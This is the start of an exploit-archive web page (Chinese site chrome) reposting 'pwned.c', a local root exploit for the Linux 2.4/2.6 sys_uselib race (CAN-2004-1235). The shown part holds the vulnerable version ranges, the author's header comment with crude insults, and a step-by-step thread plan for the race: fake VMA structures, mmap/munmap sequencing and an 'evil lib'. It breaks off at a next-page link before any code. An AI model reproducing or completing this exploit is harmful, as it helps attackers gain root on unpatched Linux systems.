+设为首页 +添加到收藏夹
linux kernel 2.4.x / 2.6.x uselib() local privilege escalation exploitdate : 22/03/2005 can-2004-1235 : kernel 2.4.x <= 2.4.29-rc2 and 2.6.x <= 2.6.10 are vulnerable
/*
* pwned.c - linux 2.4 and 2.6 sys_uselib local root exploit. private.
* its not the best one, the ldt approach is definitively better.
* discovered may 2004. no longer private because lorian/cliph/ihaquer
* can lick my balls.
* (c) 2004 sd <sd@fucksheep.org>
* requieres cca 1gb on fs.
*/
/*
* first create fake vma structs.
*
*
* lets have 3 threads, t1, t2 and t3.
* t1 and t2 have common vm.
*
* t3:
* - wait4sig (will come back from t2)
* - write(fd3, bigmem, bigfile_size)
* - exit()
* t1:
* - fd3 = empty file
* - fd1 = bigfile, writing it took 16 secs
* - bigmem = mmap(null, bigfile_size, fd1, 0);
* - t3 = fork()
* - t2 = clone()
* - fd2 = munmap_file, size of ram.
* - mumem = mmap(null, munmap_file_size, fd2)
* - mmap(mumem, 4096, anonymous) // for extending do_brk check
* - mmap lots of vmas
* - close(fd2);
* - create evil lib
* - free lot of vmas
* - sig @ t2
* - evil_lib->do_munmap(mumem + 4096, munmap_file_size - 4096);
* - sem = 1
* - waitpid
* t2:
* - wait4sig
* - sleep(100msec)
* - mmap(mumem, fd3, 4096) // this is being protected by i_sem !
* - sendsig @ t3
* - sleep(100msec)
* - if (sem) error
* - msyn... 下一页